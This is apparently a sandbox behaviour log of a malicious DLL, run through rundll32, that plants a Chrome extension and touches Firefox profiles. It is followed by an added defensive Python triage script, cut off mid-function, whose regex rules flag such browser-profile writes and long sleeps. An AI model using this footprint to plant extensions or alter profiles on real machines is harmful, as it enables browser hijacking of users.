Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sw
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sw\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ta
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ta\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\te
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\te\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\th
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\th\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\tr
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\tr\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\uk
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\uk\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\vi
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\vi\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CN
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CN\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TW
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TW\messages.json
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\esJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\etJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\et\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\faJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fa\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\filJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fil\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\frJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\guJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\gu\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\heJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\he\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\huJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hu\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\idJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\id\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\itJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\it\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\jaJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ja\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\knJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\kn\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\koJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ko\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ltJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lt\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lvJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lv\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mkJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mlJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ml\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\msJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ms\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nlJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\noJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\no\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\plJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ptJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BRJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BR\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PTJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PT\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\roJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ro\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ruJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ru\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\skJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\slJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sqJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sq\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\srJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\svJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sv\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\swJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sw\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\taJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ta\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\teJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\te\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\thJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\th\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\trJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\tr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ukJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\uk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\viJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\vi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CNJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CN\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TW\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation (4 identical entries)
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: omni.ja.bak.3.dr Binary or memory string: "vmware.com",
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation (5 identical entries)
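The events in this report (an unpacked extension written into Chrome's per-profile Extensions directory by rundll32.exe rather than by chrome.exe, the Firefox profile directory enumerated and its prefs.js, addonStartup.json.lz4 and permissions.sqlite written by the same rundll32.exe, and a 120000 ms thread delay that matches the "execution stops while process was sleeping" signature) are the kind of thing a triage script can pull out of a behaviour log without waiting for an AV verdict. The Python below is an added example written for this page; it is not code from Joe Sandbox, from the analysed sample, or from any browser vendor. It parses lines in the "Source: <process> <action>: <target>" layout used here, flags browser-profile writes by any process that is not the browser itself (a Chrome extension id is always 32 characters from a-p, which is what the path regex checks), and flags long sleeps. The sample lines are constructed from this report's events plus one made-up chrome.exe write with the placeholder extension id aaaabbbbccccddddeeeeffffgggghhhh as a benign control; the rule names, the 60-second threshold and the list of sensitive Firefox files are my choices, not anything the report defines.

```python
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str  # image name of the process that performed the action
    detail: str   # what it touched


# Behaviour lines in this report read "Source: <process path> <action>: <target>".
EVENT_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?\.exe)\s+"
    r"(?P<action>File created|File written|File opened|Thread delayed|Process information set):\s*"
    r"(?P<target>.*)$",
    re.IGNORECASE,
)
# Unpacked Chrome extension layout: ...\User Data\<profile>\Extensions\<id>\<version>_<n>\...
# Chrome extension ids are 32 characters drawn from a-p, so anything else is not an extension dir.
CHROME_EXT_RE = re.compile(
    r"\\Google\\Chrome\\User Data\\[^\\]+\\Extensions\\(?P<ext_id>[a-p]{32})\\(?P<version>[^\\]+)\\",
    re.IGNORECASE,
)
FIREFOX_PROFILE_RE = re.compile(
    r"\\Mozilla\\Firefox\\Profiles\\(?P<profile>[^\\]+)\\(?P<file>[^\\]+)$", re.IGNORECASE
)
# Profile files that carry settings and add-on state (my selection). The temp and journal
# variants seen in this report (prefs.js_tempXXXX, permissions.sqlite-journal) share the
# prefix, so a prefix match covers them too.
FIREFOX_SENSITIVE = ("prefs.js", "user.js", "addonstartup.json.lz4", "extensions.json", "permissions.sqlite")
CHROME_OWNERS = {"chrome.exe"}     # the only process that should populate Extensions\
FIREFOX_OWNERS = {"firefox.exe"}   # the only process that should write a Firefox profile
DELAY_THRESHOLD_MS = 60_000        # assumption; the report shows a 120000 ms delay

# Constructed sample: events copied from this report plus one made-up chrome.exe write
# (placeholder extension id) that must NOT be flagged.
SAMPLE_EVENTS = r"""
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\de\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\SysWOW64\rundll32.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4
Source: C:\Windows\SysWOW64\rundll32.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journal
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aaaabbbbccccddddeeeeffffgggghhhh\1.0.0_0\manifest.json
"""


def parse_event(line):
    """Return (process image name, action, target) for one behaviour line, or None."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    proc = m.group("proc").rsplit("\\", 1)[-1].lower()
    return proc, m.group("action").lower(), m.group("target")


def analyze(text):
    """Run the three rules over a behaviour log; one Finding per distinct (rule, process, detail)."""
    findings, seen = [], set()

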